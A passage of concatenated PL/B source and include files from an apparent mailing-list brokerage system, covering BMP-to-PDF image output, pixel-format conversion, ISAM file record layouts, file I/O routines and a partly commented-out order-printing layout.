MOVE (aspecto*fscratch1), pdfpos.width
ENDIF
.
. Write the XObject
.
INCR ObjNum
INCR pictnum
SQUEEZE pictnum,char2
SQUEEZE objNum,scratch
.
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;" << /Type /XObject"
WRITE pdffile,seq;" /Subtype /Image"
WRITE pdffile,seq;" /Name /Img",*ll,char2
WRITE pdffile,seq;" /ColorSpace /DeviceRGB ",*ll,PDFFilter
.
MOVE BMPi.width,fm10
WRITE pdffile,seq;" /Width ",fm10
.
MOVE BMPi.height,fm10
WRITE pdffile,seq;" /Height ",fm10
.
WRITE pdffile,seq;" /BitsPerComponent 8" //24 bit images have 8 bit components
WRITE pdffile,seq;" /Length ",strlen
WRITE pdffile,seq;" >>"
.
WRITE pdffile,seq;"stream"
WRITE pdffile,seq;strdat
WRITE pdffile,seq;"endstream"
WRITE pdffile,seq;"endobj"
WRITE pdffile,seq;
.
DFREE strdat
.
MOVE ImageFileName,ImageFNames(pictnum)
MOVE ObjNum,ImageObjNum(pictnum)
MOVE bmpi.width,ImageWidth(pictnum)
MOVE bmpi.height,ImageHeight(PictNum)
.
ELSE
.
SQUEEZE ImageNum,Char2
MOVE ImageNum,pictnum
.
. figure out image scaling and adjust size to prevent stretch
.
MOVE ImageWidth(pictnum),fscratch1
MOVE ImageHeight(pictnum),fscratch2
.
CALC aspecti = pdfpos.width / fscratch1
CALC aspecto = pdfpos.height / fscratch2
IF ( aspecti < aspecto )
MOVE (aspecti*fscratch2), pdfpos.height
ELSE
MOVE (aspecto*fscratch1), pdfpos.width
ENDIF
.
ENDIF
.
. WRITE pages(curpage),seq;"q"
. WRITE pages(curpage),seq;pdfpos," cm" //width ? ? height horz vert
. WRITE pages(curpage),seq;" /Img",*ll,char2," Do"
. WRITE pages(curpage),seq;"Q"
PACK content,"q ",pdfpos," cm /Img",char2," Do Q",CRLF
APPEND content,page(curpage).content
TYPE page(curpage).imgres
if EOS
MOVE " ",page(curpage).imgres
endif
APPEND "/Img",page(curpage).imgres
APPEND char2,page(curpage).imgres
APPEND " ",page(curpage).imgres
APPEND ImageObjNum(pictnum),page(curpage).imgres
APPEND " 0 R ",page(curpage).imgres
FUNCTIONEND
.
. convert 16 or 32 bit images to 24 bit
.
cvt24 LFUNCTION
inBitCnt form 2
data dim ^
entry
inlen form 10
outdata dim ^
pixel dim ^
pixred integer 2
pixgrn integer 2
pixblu integer 2
outpixel integer 3
outpixd dim 3
.
MOVEPLEN Data,inlen
.
.calculate size needed for conversion
.
IF (inBitCnt = 16 )
DIV "2",inlen
DMAKE pixel,2
ELSE
DIV "4",inlen
DMAKE pixel,4
ENDIF
MULT "3",inlen
.
DMAKE outdata,inlen
.
LOOP
REMOVE data,pixel
BREAK IF EOS
IF (inBitCnt=32)
BUMP pixel,4 // strip alpha
MOVE pixel,outpixd
ELSE
.
. break out 16-bit RGB (assumes 5-5-5 scheme)
.
MOVE pixel,pixred
SHIFTRIGHT pixred,10 // right justify red
SHIFTLEFT pixred,3 // intesify to 8 bits
AND 31,pixgrn // strip off MSB
MOVE pixel,pixgrn
SHIFTRIGHT pixgrn,5 // right justify green
AND 31,pixgrn // strip off red
SHIFTLEFT pixgrn,3 // intesify to 8 bits
MOVE pixel,pixblu
AND 31,pixblu // strip red and green
SHIFTLEFT pixgrn,3 // intesify to 8 bits
. asseble 24-bit RGB
MOVE pixred,outpixel
SHIFTLEFT outpixel,8
OR pixgrn,outpixel
SHIFTLEFT outpixel,8
OR pixblu,outpixel
MOVE outpixel,outpixd
ENDIF
.
APPEND outpixd,outdata
REPEAT
RESET outdata
.
MOVE outdata,data
DFREE outdata
DFREE pixel
.
FUNCTIONEND
.
BMP2PDF LFUNCTION
imgdata dim ^
Width integer 4
Height integer 4
ENTRY
scanline dim ^
outimg dim ^
row integer 4
sz integer 4
.
pix dim 3
r integer 1
g integer 1
b integer 1
cntr integer 4
.
. output buffer calculated before alignment size because there should be
. no padding in the PDF stream
.
CALC sz=width*height*3
.
DMAKE outimg,sz
SETLPTR outimg
.
MOVE Width,sz
MULT "3",sz // 3-bytes per pixel
DMAKE scanline,sz
.
. adjust width for alignment padding
.
ADD "3",width
DIV "4",width
MULT "4",width
.
MULT "3",width // byte count
.
. walk the scan lines
.
FOR row,1,height
MOVE imgdata,scanline
BUMP imgdata,width
.
FOR cntr,1,sz // BGR to RGB
MOVE scanline,pix
UNPACK pix,b,g,r
PACK pix,r,g,b
MOVELS pix,scanline
BUMP scanline,3
REPEAT
RESET scanline
.
RESET outimg,(((height-row)*sz)+1)
MOVELS scanline,outimg
REPEAT
.
MOVE outimg,imgdata
DFREE scanline
DFREE outimg
.
FUNCTIONEND
<file_sep>/include/NPNDDD.INC
......................................
.NPNDDD INCLUSION
.NIN Pending, LCR & Pending Cancelled ORDER FILE DEFINITION
.
.FILE NAME: NINPND
.REC LENGTH: 48 FIXED
.INDEX KEY: (1) 1-3 (LR#)
.
.
NPNDNAME INIT "NINPND.isi|NINS1:502"
NPNDFILE IFILE KEYLEN=3,FIXED=48
NPNDFLD DIM 6
NPNDFLAG FORM 1
NPNDPATH FORM 1
NPNDLOCK FORM 1
.
SEQEOF2 FORM "-4"
.
.
NPNDVARS LIST
NPNDCODE DIM 1 001-001 TYPE OF STATUS
."p" = pending
."x" = cancelled
."l" = LCR
NPNDSTAT DIM 2 002-003 STATUS CODE
NPNDDESC DIM 45 004-048 STATUS DESCRIPTION
LISTEND
<file_sep>/include/MDCSegIO.inc
..............................................................................
.******************************************************
.* MSeg List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MSeg DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_Seg
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing MSeg, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MSegKEY
. REQUIRED : 'MSegFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MSegKEY Branch MsegPath to Mseg1a,Mseg1c
MSeg1a BRANCH MSegFlag TO MSeg1b
CALL MSegOpen
MSeg1b FILEPI 1;MSegFile
READ MSegFile,MSegFld;MSegVars
RETURN
MSeg1c BRANCH MSegFlag TO MSeg1d
CALL MSegOpen
MSeg1d FILEPI 1;MSegFile2
READ MSegFile2,MSegFld2;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegTST
. REQUIRED : MSegFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
MSegTST Branch MSegpath to Mseg2a,mSeg2c
Mseg2a BRANCH MSegFlag TO MSeg2b
CALL MSegOpen
MSeg2b FILEPI 1;MSegFile
READ MSegFile,MSegFld;STR1
RETURN
Mseg2c BRANCH MSegFlag TO MSeg2e
CALL MSegOpen
MSeg2e FILEPI 1;MSegFile2
READ MSegFile2,MSegFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : MSegKS
. REQUIRED :
. RETURNED : MSeg Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MSegKS BRANCH MSegFlag TO MSeg3
CALL MSegOpen
MSeg3 FILEPI 1;MSegFile
READKS MSegFile;MSegVars
RETURN
..............................................................................
. ENTRY POINT : MSegSEQ
. REQUIRED :
. RETURNED : MSeg Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MSegSEQ BRANCH MSegFlag TO MSeg4
CALL MSegOpen
MSeg4 FILEPI 1;MSegFile
READ MSegFile,SEQ;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegWRT
. REQUIRED : 'MSegFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MSegWRT BRANCH MSegFlag TO MSeg5
CALL MSegOpen
MSeg5 FILEPI 1;MSegFlist
WRITE MSegFList;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MSegUPD BRANCH MSegFlag TO MSeg6
CALL MSegOpen
MSeg6
FILEPI 1;MSegFlist
UPDATE MSegFlist;MSegVars
RETURN
..............................................................................
.
. ENTRY POINT : MSegDEL
. REQUIRED : 'MSegFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MSegDEL BRANCH MSegFlag TO MSeg7
CALL MSegOpen
MSeg7 FILEPI 1;MSegFList
DELETE MSegFList
RETURN
..............................................................................
.
. ENTRY POINT : MSegOpen
. REQUIRED : 'MSegFlag' 'MSegPATH'
. RETURNED : 'MSegFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MSegOpen TRAP MSegGONE giving error IF IO
OPEN MSegFList
TRAPCLR IO
MOVE C1 TO MSegFlag
RETURN
..............................................................................
MSegGONE MOVE MSegNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/SRDSdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: XML from SRDS if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 13 April 2011 DLH New
......................................................
.
SRDSFlist Filelist
SRDSFILE IFILE fixed=707,Name="SRDS_Main.Isi|NINS1:502"
SRDSFILE2 AFILE fixed=707,Name="SRDS_Main.AAm|NINS1:502"
FilelistEnd
SRDSNAME Init "SRDS_Main|NINS1:502"
SRDSFLAG FORM 1
SRDSPATH FORM 1
SRDSLock FORM 1
SRDSFLd Dim 6
SRDSfld2 Dim 53 .aim key
SRDSCSVSTR DIM 800
.
SRDSVARS LIST .
SRDSLSTNUM DIM 6 1-6 ZERO FILLED KEY.
SRDSOWNNUM DIM 6 7-12 OWNER NUMBER (KEY FOR NINOWN FILES)
SRDSDATFUL DIM 6 13-18 FULFILLMENT NUMBER
SRDSDATMAN DIM 6 19-24 MANAGER
SRDSPRICE Form 4.2 25-31 Base Price
SRDSNLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
SRDSHOTLINE DIM 1 33-33 HOTLINE CODE (Y or N).
SRDSNEWDATE DIM 8 34-41 DATE CARD PUT UP CCYYMMDD FORMAT
SRDSREVDATE DIM 8 42-49 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD data date (use last clean date)
SRDSPASSWORD DIM 10 50-59 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
SRDSMLSTNAME DIM 75 60-134 MASTER LIST NAME.
SRDSCLEANCDE DIM 4 135-138 CLEANED CODE (Cxxx).
SRDSCLNINFO DIM 38 139-176 CLEAN INFORMATION.
SRDSNETNAME DIM 4 177-180 NET NAME CODE (Nxxx).
SRDSNETINFO DIM 38 181-218 NET NAME INFORMATION.
SRDSDELCODE DIM 4 219-222 DELIVERY CODE (Dxxx).
SRDSSAMPLE DIM 4 223-226 SAMPLE CODE (Pxxx).
SRDSSEX DIM 15 227-241 SEX TEXT. OFF 1 BYTE
SRDSMIN DIM 11 242-252 MINIMUM TEXT.
SRDSUNIVERSE DIM 10 253-262 UNIVERSE QUANTITY.
SRDSUNITDATA DIM 188 263-450
SRDSNDATUPDDATE DIM 8 451-458 UPDATE DATE touched date
SRDSCOMMPER DIM 6 459-467 COMMISSION.
SRDSNDATVerf Dim 8 468-475 Date info last confirmed data
SRDSNdatMen form 3.2 476-481 percent men
SRDSNdatFem Form 3.2 482-487 percent female
SRDScntct Dim 50 488-537
SRDScphone RECORD 538-547
SRDScphone1 Dim 3
SRDScphone2 Dim 3
SRDScphone3 Dim 4
REcordend
SRDScFax Record 548-557
SRDScFax1 dim 3
SRDScFax2 dim 3
SRDScFax3 dim 4
RecordEnd
SRDScEmail Dim 50 558-607
SRDSStatus Dim 1 608-608
SRDSNDatFill Dim 99 609-707
LISTEND
<file_sep>/include/SRDSSELIO.inc
..............................................................................
.******************************************************
.* SRDSSEL List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDSSEL DATACARD FILES.
.* ****************************************************
.
. FILE: SRDS_SEL
. LENGTH: Fixed=140
. COMPRESS: NONE
. TYPE: Isam
......................................................
...............................................
. ENTRY POINT : SRDSSELKEY
. REQUIRED : 'SRDSSELFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
SRDSSELKEY Branch SRDSSELPath to SRDSSEL1a,SRDSSEL1c
SRDSSEL1a BRANCH SRDSSELFlag TO SRDSSEL1b
CALL SRDSSELOpen
SRDSSEL1b FILEPI 1;SRDSSELFile
READ SRDSSELFile,SRDSSELFld;SRDSSELVars
RETURN
SRDSSEL1c BRANCH SRDSSELFlag TO SRDSSEL1d
CALL SRDSSELOpen
SRDSSEL1d FILEPI 1;SRDSSELFile2
READ SRDSSELFile2,SRDSSELFld2;SRDSSELVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELTST
. REQUIRED : SRDSSELFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
SRDSSELTST Branch SRDSSELpath to SRDSSEL2a,SRDSSEL2c
SRDSSEL2a BRANCH SRDSSELFlag TO SRDSSEL2b
CALL SRDSSELOpen
SRDSSEL2b FILEPI 1;SRDSSELFile
READ SRDSSELFile,SRDSSELFld;STR1
RETURN
SRDSSEL2c BRANCH SRDSSELFlag TO SRDSSEL2e
CALL SRDSSELOpen
SRDSSEL2e FILEPI 1;SRDSSELFile2
READ SRDSSELFile2,SRDSSELFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELKS
. REQUIRED :
. RETURNED : SRDSSEL Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
SRDSSELKS BRANCH SRDSSELFlag TO SRDSSEL3
CALL SRDSSELOpen
SRDSSEL3 FILEPI 1;SRDSSELFile
READKS SRDSSELFile;SRDSSELVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELKS
. REQUIRED :
. RETURNED : SRDSSEL VALID READ OR NO
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
SRDSSELKS1 BRANCH SRDSSELFlag TO SRDSSEL3A
CALL SRDSSELOpen
SRDSSEL3A FILEPI 1;SRDSSELFile
READKS SRDSSELFile;SRDSSELLIST
RETURN
..............................................................................
. ENTRY POINT : SRDSSELSEQ
. REQUIRED :
. RETURNED : SRDSSEL Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
SRDSSELSEQ BRANCH SRDSSELFlag TO SRDSSEL4
CALL SRDSSELOpen
SRDSSEL4 FILEPI 1;SRDSSELFile
READ SRDSSELFile,SEQ;SRDSSELVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELWRT
. REQUIRED : 'SRDSSELFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
SRDSSELWRT BRANCH SRDSSELFlag TO SRDSSEL5
CALL SRDSSELOpen
SRDSSEL5 FILEPI 1;SRDSSELFlist
WRITE SRDSSELFList;SRDSSELVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
SRDSSELUPD BRANCH SRDSSELFlag TO SRDSSEL6
CALL SRDSSELOpen
SRDSSEL6
FILEPI 1;SRDSSELFlist
UPDATE SRDSSELFlist;SRDSSELVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELDEL
. REQUIRED : 'SRDSSELFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
SRDSSELDEL BRANCH SRDSSELFlag TO SRDSSEL7
CALL SRDSSELOpen
SRDSSEL7 FILEPI 1;SRDSSELFList
DELETE SRDSSELFList
RETURN
..............................................................................
.
. ENTRY POINT : SRDSSELOpen
. REQUIRED : 'SRDSSELFlag' 'SRDSSELPATH'
. RETURNED : 'SRDSSELFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
SRDSSELOpen TRAP SRDSSELGONE giving error IF IO
OPEN SRDSSELFList
TRAPCLR IO
MOVE C1 TO SRDSSELFlag
RETURN
..............................................................................
SRDSSELGONE MOVE SRDSSELNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/nrtndd104.inc
; Last change: DLH 6/13/2002 11:01:20 AM
;.............................................................................
;
; NRTNDD INCLUSION
; NIN RETURN-TO FILE DEFINITION
;
; FILE NAME : NINRTN
; REC LENGTH: 227 FIXED. INDEX KEY : 1-4 (4 POSITION RTN#)
; AIM KEY : 50-94
;
. RElease 1.3 24Apr07 DLH added file manager
. RElease 1.2 12April2007 DLH inactive byte
. RElease 1.1 19AUG98 ASH Y2K CONVERSION
;.............................................................................
;
NRTNFILE IFILE KEYLEN=4,FIXED=227,UNCOMP,Name="NINRTN.isi|10.10.30.104:502"
NRTNNAME INIT "NINRTN|10.10.30.104:502 "
NRTNFLE2 AFILE
NRTNFLE3 FILE FIXED=227
NRTNFLD DIM 7
NRTNFLD2 DIM 48
NRTNFLAG FORM 1
NRTNFLG2 FORM 1
NRTNFLG3 FORM 1
NRTNPATH FORM 1
NRTNLOCK FORM 1 0 or 1=File Locks, 3=Record Locks, 3=No Locks
;
;..............................................................................
*
rtnvars list
RTNUM DIM 4 1-4 RETURN-TO NUMBER. **KEY**
;RTCNTCT DIM 25 5-29 RETURN-TO CONTACT NAME.
RTCNTCT DIM 45 5-49 RETURN-TO CONTACT NAME.
;RTCOMP DIM 25 30-54 RETURN-TO COMPANY NAME.
RTCOMP DIM 45 50-94 RETURN-TO COMPANY NAME.
RTADDR DIM 25 95-119 RETURN-TO ADDRESS.
RT2ADDR DIM 25 120-144 RETURN-TO ADDRESS2.
RTCITY DIM 15 145-159 RETURN-TO CITY.
RTSTATE DIM 2 160-161 RETURN-TO STATE.
RTZIP DIM 10 162-171 RETURN-TO ZIP.
RTCOUN DIM 15 172-186 RETURN-T0 COUNTRY CODE
RTNAME DIM 10 187-196 PASSWORD NAME
;RTREVDAT DIM 6 117-122 REVISED DATE.
RTREVDAT DIM 8 197-204 REVISED DATE.
.RTBLANK DIM 3 205-207 NOT-USED.
RTBLANK DIM 2 205-206 NOT-USED.
RTActive Dim 1 207-207 ' ','Y'=active 'N' = do not use
RTTELE DIM 10 208-217 TELEPHONE
RTFAX DIM 10 218-227 FAX NUMBER.
listend
;
LISTOFF
;PROGRAM ACCESS.
;F:\LIBRARY\PLB_SRC
;NAME TYPE ACCESS
;NCHK002L PLS READ
;NINC0007 PLS READ
;NINV0001 PLS READ
;NINV0003 PLS READ
;NINV002L PLS READ
;NINV0099 PLS READ
;NMRG0001 PLS READ
;NMRG0002 PLS READ
;NORD0001 PLS READ
;NORD0009 PLS READ
;NORD0023 PLS READ
;NORD0024 PLS READ
;NORD002L PLS READ
;NORD013B PLS READ
;NORD013C PLS READ
;NORD013D PLS READ
;NORD013E PLS READ
;NORD013Z PLS READ
;NRTN0001 PLS READ,WRITE,UPDATE
;NRTN0002 PLS READ
;NRTN7777 PLS READ
;NSHP0001 PLS READ
;NXCH0001 PLS READ
;NXCH0099 PLS READ
;F:\LIBRARY\DEVELOP
;NAME TYPE ACCESS
;NMPL0001 PLS READ
;NMPL0002 PLS READ
;F:\APPS\PLB\CODE
;NAME TYPE ACCESS
;EOM1ST WBT
;MISC WBT
;PERGE WBT
;FRIDAY BAK
;FRIDAY WBT
LISTON
<file_sep>/include/ncmp2dd.inc
...................................................
.
. NCMP2DD INCLUSION
. NIN/Integral cross reference file for Campaign file
. FILE NAME : NINCMP2.DAT
. REC LENGTH: 53 FIXED
. INDEX KEY : (1) 001-006 (Campaign Num)
. (2) 007-024 (Integral Scenario ID)
. AAMDEX KEY: (1) 001-006 (Campaign Num)
. (2) 007-024 (Integral Campaign ID)
. (3) 025-025 (Update Byte)
.
.
NCMP2NAME INIT "NINCMP2 "
NCMP2NME1 INIT "NINCMP2A"
NCMP2FLIST Filelist
NCMP2FILE IFILE KEYLEN=6,FIXED=53,Name="NINCMP2.isi|NINS1:502"
NCMP2FLE1 IFILE KEYLEN=18,FIXED=53,Name="NINCMP2A.isi|NINS1:502"
NCMP2FLE2 AFILE FIXED=53,Name="NINCMP2.aam|NINS1:502"
.NCMP2FILE IFILE KEYLEN=6,FIXED=53,Name="NINCMP2|20.20.30.103:502"
.NCMP2FLE1 IFILE KEYLEN=18,FIXED=53,Name="NINCMP2A|20.20.30.103:502"
.NCMP2FLE2 AFILE FIXED=53,Name="NINCMP2|20.20.30.103:502"
filelistend
NCMP2FLD DIM 6 Campaign Number(ISAM)
NCMP2FLD1 DIM 18 Integral Scenario ID(ISAM)
NCMP2FLD2 DIM 9 Campaign Number(AAM)
NCMP2FLD3 DIM 21 Integral Scenario ID(AAM)
NCMP2FLD4 DIM 4 Update Byte(AAM)
NCMP2FLAG FORM 1
NCMP2PATH FORM 1
NCMP2LOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NCMP2VARS LIST
NCMP2Num DIM 6 001-006 Campaign Number(Key)
NCMP2INum DIM 18 007-024 Integral Scenario ID(Key)
NCMP2Upd DIM 1 025-025 Update Byte: '0'=No Update necessary, '1'=Need to Update Integral
NCMP2UDate DIM 8 026-033 Update Date
NCMP2Filler DIM 20 034-053 Update Date
listend
<file_sep>/include/SCHEDULE.INC
.
. MAILDATE FILE RECORD SIZE 27 FIXED
. .............
.
SCHKEY DIM 6 1-6 LIST NUMBER
SCHYEAR DIM 2 7-8 YEAR SCEDULED (ASSUMED TO BE CURRENT YEAR IF
. NOT SPECIFIED).
SCHMONTH DIM 2 9-10 MONTH SCEDULED
SCHDAY DIM 2 11-12 DAY SCEDULED (ALWAYS A MONDAY).
SCHMLR DIM 7 13-19 MAILER DESC KEYED IN
SCHQUANT DIM 7 20-26 QUANTITY SCHEDULED KEYED IN.
.
.
. NINMDLST FILE RECORD SIZE 152 FIXED.
. .............
.
.SCHKEY DIM 6 KEY - LIST NUMBER 1-6
SCHLINE1 DIM 70 LINE ONE DESCRIPTION. 7-76
SCHLINE2 DIM 68 LINE TWO DESCRIPTION. 77-146
SCHCODE DIM 1 SCHEDULING ALLOWED = ' ' 145-145
SCHLCRCD DIM 1 LCR'S ALLOWED = ' ' 146-146
SCHPLAN DIM 3 PLANNERS INITIALS 147-149
SCHCALL DIM 3 CALLERS INITIALS 150-152
.
<file_sep>/include/NADJIO.inc
..............................................................................
.
. NADJIO INCLUSION
. NIN ADJUSTMENT FILE I/O ROUTINES
.
. FILE NAME : NINADJ
.
.patch 1.1 new structure use adjvars
..............................................................................
.
. ENTRY POINT : NADJKEY
. REQUIRED : 'NADJFLD'
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NADJKEY BRANCH NADJFLAG TO NADJ1
CALL NADJOPEN
NADJ1 FILEPI 1;NADJFILE
READ NADJFILE,NADJFLD;adjvars
RETURN
..............................................................................
.
. ENTRY POINT : NADJTST
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : ISAM KEY TEST READ
.
NADJTST BRANCH NADJFLAG TO NADJ2
CALL NADJOPEN
NADJ2 FILEPI 1;NADJFILE
READ NADJFILE,NADJFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NADJKS
. REQUIRED :
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : KEY SEQUENTIAL MASTER ADJUSTMENT FILE READ
.
NADJKS BRANCH NADJFLAG TO NADJ3
CALL NADJOPEN
NADJ3 FILEPI 1;NADJFILE
READKS NADJFILE;adjvars
RETURN
..............................................................................
.
. ENTRY POINT : NADJSEQ
. REQUIRED :
. RETURNED : MASTER ADJUSTMENT RECORD
. DESCRIPTION : SEQUENTIAL MASTER ADJUSTMENT FILE READ
.
NADJSEQ BRANCH NADJFLAG TO NADJ4
CALL NADJOPEN
NADJ4 FILEPI 1;NADJFILE
READ NADJFILE,SEQ;adjvars
RETURN
..............................................................................
.
. ENTRY POINT : NADJWRT
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NADJWRT BRANCH NADJFLAG TO NADJ5
CALL NADJOPEN
NADJ5 FILEPI 1;NADJFILE
WRITE NADJFILE,NADJFLD;adjvars
RETURN
..............................................................................
.
. ENTRY POINT : NADJUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST FILE
.
NADJUPD BRANCH NADJFLAG TO NADJ6
CALL NADJOPEN
NADJ6 FILEPI 1;NADJFILE
UPDATE NADJFILE;adjvars
RETURN
..............................................................................
.
. ENTRY POINT : NADJDEL
. REQUIRED : 'NADJFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NADJDEL BRANCH NADJFLAG TO NADJ7
CALL NADJOPEN
NADJ7 FILEPI 1;NADJFILE
DELETE NADJFILE,NADJFLD
RETURN
...............................................................................
.
. ENTRY POINT : NADJOPEN
. REQUIRED : 'NADJFLAG'
. RETURNED : 'NADJFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MASTER ADJUSTMENT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NADJOPEN TRAP NADJGONE IF IO
OPEN NADJFILE,NADJNAME
TRAPCLR IO
MOVE C1 TO NADJFLAG
RETURN
NADJGONE MOVE NADJNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/Nbrk2dd.inc
..............................................................................
.
. NBRK2DD INCLUSION
. NIN BROKER NOTES FILE DEFINITION
.
. FILE NAME : NINBRK2
. REC LENGTH: 754
. INDEX KEY : 1-4
.
.ASH 29DEC2000 - FILE CREATED
..............................................................................
.
NBRK2FILE IFILE KEYLEN=4,VAR=754,NODUPLICATES
.NBRK2NAME INIT "NINBRK2.ISI|20.20.30.103:502"
NBRK2NAME INIT "NINBRK2.ISI"
NBRK2FLD DIM 4
NBRK2FLAG FORM 1
nBRK2lock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NBRK2VARS list
BRK2BRK dim 4 1-4 BRK NUMBER
BRK2NOTES DIM 750 5-754 BRK NOTES
listend
<file_sep>/include/prtorderpage1PL.inc
.test test.test
. include common.inc
. include cons.inc
. include norddd.inc
.str500 dim 500
. include hp.inc
.Patch 1.31 12Jul2007 JD Fixed zip
.Patch 1.3 8JAN2007 DLH PL LOGO
.Patch 1.21 30JAN2006 JD Company/Broker address print Mailer/Office copy.
.Patch 1.2 06AUG2004 ASH Logo Conversion
.Patch 1.1 17FEB2004 ASH DATACARD CONVERSION
prtdetail external "NCMP0002;prtdetail"
.Blockout PICT
.Blockout1 PICT
.font1 font
.Font4 font
.font5 font
.fontO8 font
.fontO9I font
.fontO10 font
..fontO10B font
.fontO12B font
.fontO14 font
.FontO14B font
.FontO14BI font
.FontO18I font
.FontO7 font
.FontO7dot5 font
.FontO7dot5B font
.FontO7dot5I font
.FontO7dot5BI font
.FontO18B font
.FontO18BI font
.PRTPG24B font
.PRTPG24I font
.PRTPG10 font
..Create fonts to be used
.sevenfive form "7.5"
. create font1,"Times New Roman",size=14,bold
. create fontO8,"Times New Roman",size=8
. create font5,"Times New Roman",size=11
. create fontO9I,"Times New Roman",size=9,Italic
. create fontO10,"Times New Roman",size=10
.. create fontO10B,"Times New Roman",size=10,Bold
. create fontO12B,"Times New Roman",size=12,Bold
. create fontO14,"Times New Roman",size=14
. create fontO14B,"Times New Roman",size=14,Bold
. create fontO14BI,"Times New Roman",size=14,Bold,Italic
. create fontO18I,"Times New Roman",size=18,Italic
. create fontO7,"Times New Roman",size=7
. create fontO7dot5,"Times New Roman",size=sevenfive
. create fontO7dot5I,"Times New Roman",size=sevenfive,Italic
. create fontO7dot5b,"Times New Roman",size=sevenfive,Bold
. create fontO7dot5bI,"Times New Roman",size=sevenfive,Bold,Italic
. create fontO18B,"Times New Roman",size=18,Bold
. create fontO18BI,"Times New Roman",size=18,Bold,Italic
..
. create PRTpg24B,"Times New Roman",size=24,Bold
. create PRTpg24I,"Times New Roman",size=24,Italic
. create PRTpg10,"Times New Roman",size=10
GreyFill Color
.Black Color
NoFIll Color
colornum form 24
.Laser PFILE ^
.Laser PFILE
. PRTOPEN Laser,str500,"test fax"
.testing
. pack NORDFLD,"425663"
. move C1,NORDPATH
. call NORDKEY
. call prtmlrboxGui
. call prtordfrmGuiA
. call prtdetail using laser,NORDFLD
. shutdown
.hi English 1000 units to an inch
.old code 300 units per inch
.PortraitLTRHEADGuiLand Routine Laser
. PRTPAGE Laser;*units=*HIENGLISH,*ROWSPACE=0,*COLSPACE=0,*Overlayon,*ORIENT=*LANDSCAPE:
. *p=3925:250,*font=prtpg24B,"Names ":
. *font=prtpg24I," in the News":
. *PENSIZE=10,*p=3550:550,*Line=7050:550:
